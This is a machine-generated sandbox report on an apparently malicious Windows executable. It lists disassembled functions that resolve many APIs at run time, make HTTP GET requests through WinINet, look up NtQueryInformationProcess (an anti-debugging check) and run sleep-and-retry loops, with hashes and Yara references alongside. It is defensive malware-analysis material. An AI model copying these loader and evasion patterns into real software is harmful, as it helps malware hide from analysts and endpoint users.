                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitInfoProcessSystem
                                                                                  • String ID:
                                                                                  • API String ID: 752954902-0
                                                                                  • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                                                  • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                                                  • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                                                  • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6
                                                                                  Function 00419C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2EF0), ref: 00419C2D
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2E50), ref: 00419C45
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905CA0), ref: 00419C5E
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905CB8), ref: 00419C76
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905EF8), ref: 00419C8E
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905EB0), ref: 00419CA7
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D62B0), ref: 00419CBF
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905EC8), ref: 00419CD7
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905F10), ref: 00419CF0
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905EE0), ref: 00419D08
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905F28), ref: 00419D20
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2D90), ref: 00419D39
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2F10), ref: 00419D51
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2DF0), ref: 00419D69
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2DD0), ref: 00419D82
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905E68), ref: 00419D9A
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905E98), ref: 00419DB2
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D5F68), ref: 00419DCB
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2E10), ref: 00419DE3
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905E80), ref: 00419DFB
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909758), ref: 00419E14
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909548), ref: 00419E2C
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909560), ref: 00419E44
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2E70), ref: 00419E5D
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909578), ref: 00419E75
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909590), ref: 00419E8D
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909788), ref: 00419EA6
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909740), ref: 00419EBE
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009094B8), ref: 00419ED6
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009095A8), ref: 00419EEF
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009095C0), ref: 00419F07
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009094D0), ref: 00419F1F
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009094E8), ref: 00419F38
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D5000), ref: 00419F50
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909530), ref: 00419F68
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909500), ref: 00419F81
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2F30), ref: 00419F99
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009094A0), ref: 00419FB1
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2F70), ref: 00419FCA
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009096B0), ref: 00419FE2
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909518), ref: 00419FFA
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2FD0), ref: 0041A013
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2BB0), ref: 0041A02B
                                                                                  • LoadLibraryA.KERNEL32(00909608,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                                                  • LoadLibraryA.KERNEL32(009096E0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                                                  • LoadLibraryA.KERNEL32(009095D8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                                                  • LoadLibraryA.KERNEL32(009095F0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                                                  • LoadLibraryA.KERNEL32(00909620,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                                                  • LoadLibraryA.KERNEL32(00909770,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                                                  • LoadLibraryA.KERNEL32(00909680,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                                                  • LoadLibraryA.KERNEL32(00909638,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                                                  • GetProcAddress.KERNEL32(75290000,008D2B30), ref: 0041A0DA
                                                                                  • GetProcAddress.KERNEL32(75290000,00909650), ref: 0041A0F2
                                                                                  • GetProcAddress.KERNEL32(75290000,00906070), ref: 0041A10A
                                                                                  • GetProcAddress.KERNEL32(75290000,00909668), ref: 0041A123
                                                                                  • GetProcAddress.KERNEL32(75290000,008D2C70), ref: 0041A13B
                                                                                  • GetProcAddress.KERNEL32(734C0000,008D5F90), ref: 0041A160
                                                                                  • GetProcAddress.KERNEL32(734C0000,008D2BF0), ref: 0041A179
                                                                                  • GetProcAddress.KERNEL32(734C0000,008D5FE0), ref: 0041A191
                                                                                  • GetProcAddress.KERNEL32(734C0000,009096C8), ref: 0041A1A9
                                                                                  • GetProcAddress.KERNEL32(734C0000,00909698), ref: 0041A1C2
                                                                                  • GetProcAddress.KERNEL32(734C0000,008D2C50), ref: 0041A1DA
                                                                                  • GetProcAddress.KERNEL32(734C0000,008D2AF0), ref: 0041A1F2
                                                                                  • GetProcAddress.KERNEL32(734C0000,009096F8), ref: 0041A20B
                                                                                  • GetProcAddress.KERNEL32(752C0000,008D29D0), ref: 0041A22C
                                                                                  • GetProcAddress.KERNEL32(752C0000,008D2B10), ref: 0041A244
                                                                                  • GetProcAddress.KERNEL32(752C0000,00909710), ref: 0041A25D
                                                                                  • GetProcAddress.KERNEL32(752C0000,00909728), ref: 0041A275
                                                                                  • GetProcAddress.KERNEL32(752C0000,008D2A30), ref: 0041A28D
                                                                                  • GetProcAddress.KERNEL32(74EC0000,008D61C0), ref: 0041A2B3
                                                                                  • GetProcAddress.KERNEL32(74EC0000,008D62D8), ref: 0041A2CB
                                                                                  • GetProcAddress.KERNEL32(74EC0000,00909848), ref: 0041A2E3
                                                                                  • GetProcAddress.KERNEL32(74EC0000,008D2A50), ref: 0041A2FC
                                                                                  • GetProcAddress.KERNEL32(74EC0000,008D2AD0), ref: 0041A314
                                                                                  • GetProcAddress.KERNEL32(74EC0000,008D6008), ref: 0041A32C
                                                                                  • GetProcAddress.KERNEL32(75BD0000,009097E8), ref: 0041A352
                                                                                  • GetProcAddress.KERNEL32(75BD0000,008D29F0), ref: 0041A36A
                                                                                  • GetProcAddress.KERNEL32(75BD0000,009060D0), ref: 0041A382
                                                                                  • GetProcAddress.KERNEL32(75BD0000,009097A0), ref: 0041A39B
                                                                                  • GetProcAddress.KERNEL32(75BD0000,00909800), ref: 0041A3B3
                                                                                  • GetProcAddress.KERNEL32(75BD0000,008D2B50), ref: 0041A3CB
                                                                                  • GetProcAddress.KERNEL32(75BD0000,008D2950), ref: 0041A3E4
                                                                                  • GetProcAddress.KERNEL32(75BD0000,00909818), ref: 0041A3FC
                                                                                  • GetProcAddress.KERNEL32(75BD0000,00909860), ref: 0041A414
                                                                                  • GetProcAddress.KERNEL32(75A70000,008D2B70), ref: 0041A436
                                                                                  • GetProcAddress.KERNEL32(75A70000,009097B8), ref: 0041A44E
                                                                                  • GetProcAddress.KERNEL32(75A70000,009097D0), ref: 0041A466
                                                                                  • GetProcAddress.KERNEL32(75A70000,00909830), ref: 0041A47F
                                                                                  • GetProcAddress.KERNEL32(75A70000,00909D88), ref: 0041A497
                                                                                  • GetProcAddress.KERNEL32(75450000,008D2C90), ref: 0041A4B8
                                                                                  • GetProcAddress.KERNEL32(75450000,008D2B90), ref: 0041A4D1
                                                                                  • GetProcAddress.KERNEL32(75DA0000,008D2910), ref: 0041A4F2
                                                                                  • GetProcAddress.KERNEL32(75DA0000,00909E60), ref: 0041A50A
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2930), ref: 0041A530
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2C30), ref: 0041A548
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2970), ref: 0041A560
                                                                                  • GetProcAddress.KERNEL32(6F070000,00909D70), ref: 0041A579
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2990), ref: 0041A591
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D29B0), ref: 0041A5A9
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2BD0), ref: 0041A5C2
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2C10), ref: 0041A5DA
                                                                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                                                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                                                                  • GetProcAddress.KERNEL32(75AF0000,00909C50), ref: 0041A629
                                                                                  • GetProcAddress.KERNEL32(75AF0000,00906040), ref: 0041A641
                                                                                  • GetProcAddress.KERNEL32(75AF0000,00909E48), ref: 0041A659
                                                                                  • GetProcAddress.KERNEL32(75AF0000,00909DE8), ref: 0041A672
                                                                                  • GetProcAddress.KERNEL32(75D90000,008D2CB0), ref: 0041A693
                                                                                  • GetProcAddress.KERNEL32(6F880000,00909BC0), ref: 0041A6B4
                                                                                  • GetProcAddress.KERNEL32(6F880000,008D2A10), ref: 0041A6CD
                                                                                  • GetProcAddress.KERNEL32(6F880000,00909C38), ref: 0041A6E5
                                                                                  • GetProcAddress.KERNEL32(6F880000,00909E90), ref: 0041A6FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                  • API String ID: 2238633743-1775429166
                                                                                  • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                                                  • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                                                  • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                                                  • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52
                                                                                  Function 00419860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D7FD8), ref: 004198A1
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D8038), ref: 004198BA
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D8068), ref: 004198D2
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D8098), ref: 004198EA
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D80B0), ref: 00419903
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00904578), ref: 0041991B
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D3010), ref: 00419933
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2FF0), ref: 0041994C
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D80F8), ref: 00419964
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905D90), ref: 0041997C
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905D60), ref: 00419995
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905B68), ref: 004199AD
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2DB0), ref: 004199C5
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905CE8), ref: 004199DE
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905E50), ref: 004199F6
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2D50), ref: 00419A0E
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905D00), ref: 00419A27
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905C28), ref: 00419A3F
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D3030), ref: 00419A57
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905CD0), ref: 00419A70
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D3050), ref: 00419A88
                                                                                  • LoadLibraryA.KERNEL32(00905D18,?,00416A00), ref: 00419A9A
                                                                                  • LoadLibraryA.KERNEL32(00905C88,?,00416A00), ref: 00419AAB
                                                                                  • LoadLibraryA.KERNEL32(00905BE0,?,00416A00), ref: 00419ABD
                                                                                  • LoadLibraryA.KERNEL32(00905D78,?,00416A00), ref: 00419ACF
                                                                                  • LoadLibraryA.KERNEL32(00905DD8,?,00416A00), ref: 00419AE0
                                                                                  • GetProcAddress.KERNEL32(75A70000,00905D30), ref: 00419B02
                                                                                  • GetProcAddress.KERNEL32(75290000,00905DF0), ref: 00419B23
                                                                                  • GetProcAddress.KERNEL32(75290000,00905B80), ref: 00419B3B
                                                                                  • GetProcAddress.KERNEL32(75BD0000,00905BB0), ref: 00419B5D
                                                                                  • GetProcAddress.KERNEL32(75450000,008D2ED0), ref: 00419B7E
                                                                                  • GetProcAddress.KERNEL32(76E90000,00904598), ref: 00419B9F
                                                                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                                                                                  Strings
                                                                                  • NtQueryInformationProcess, xrefs: 00419BAA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: NtQueryInformationProcess
                                                                                  • API String ID: 2238633743-2781105232
                                                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                  • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                  • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12
                                                                                  Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                  • StrCmpCA.SHLWAPI(?,00906260), ref: 00406303
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,0090B380,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                  • String ID: ERROR$ERROR$GET
                                                                                  • API String ID: 3074848878-2509457195
                                                                                  • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                                                  • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                                                  • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                                                  • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56
                                                                                  Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 826 4117a0-4117cd call 41aad0 StrCmpCA 829 4117d7-4117f1 call 41aad0 strtok_s 826->829 830 4117cf-4117d1 ExitProcess 826->830 833 4117f4-4117f8 829->833 834 4119c2-4119cd call 41a800 833->834 835 4117fe-411811 833->835 837 411817-41181a 835->837 838 41199e-4119bd strtok_s 835->838 840 411821-411830 call 41a820 837->840 841 411849-411858 call 41a820 837->841 842 4118ad-4118be StrCmpCA 837->842 843 4118cf-4118e0 StrCmpCA 837->843 844 41198f-411999 call 41a820 837->844 845 4118f1-411902 StrCmpCA 837->845 846 411951-411962 StrCmpCA 837->846 847 411970-411981 StrCmpCA 837->847 848 411913-411924 StrCmpCA 837->848 849 411932-411943 StrCmpCA 837->849 850 411835-411844 call 41a820 837->850 851 41185d-41186e StrCmpCA 837->851 852 41187f-411890 StrCmpCA 837->852 838->833 840->838 841->838 859 4118c0-4118c3 842->859 860 4118ca 842->860 861 4118e2-4118e5 843->861 862 4118ec 843->862 844->838 863 411904-411907 845->863 864 41190e 845->864 869 411964-411967 846->869 870 41196e 846->870 872 411983-411986 847->872 873 41198d 847->873 865 411930 848->865 866 411926-411929 848->866 867 411945-411948 849->867 868 41194f 849->868 850->838 855 411870-411873 851->855 856 41187a 851->856 857 411892-41189c 852->857 858 41189e-4118a1 852->858 855->856 856->838 877 4118a8 857->877 858->877 859->860 860->838 861->862 862->838 863->864 864->838 865->838 866->865 867->868 868->838 869->870 870->838 872->873 873->838 877->838
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcessstrtok_s
                                                                                  • String ID: block
                                                                                  • API String ID: 3407564107-2199623458
                                                                                  • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                                                  • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                                                  • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                                                  • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A
                                                                                  Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 879 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 895 41557c-415583 879->895 896 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 895->896 897 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 895->897 913 4155bb-4155d2 call 41a8a0 call 41a800 896->913 923 415693-4156a9 call 41aad0 StrCmpCA 897->923 926 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 897->926 913->923 929 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 923->929 930 4156af-4156b6 923->930 926->923 1061 415ac3-415ac6 929->1061 931 4157da-41585f call 41aad0 StrCmpCA 930->931 932 4156bc-4156c3 930->932 950 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 931->950 951 415865-41586c 931->951 935 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 932->935 936 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 932->936 935->931 936->931 1039 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 936->1039 950->1061 956 415872-415879 951->956 957 41598f-415a14 call 41aad0 StrCmpCA 951->957 963 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 956->963 964 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 956->964 986 415a16-415a21 Sleep 957->986 987 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 957->987 963->957 1065 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 963->1065 964->957 986->895 987->1061 1039->931 1065->957
                                                                                  APIs
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
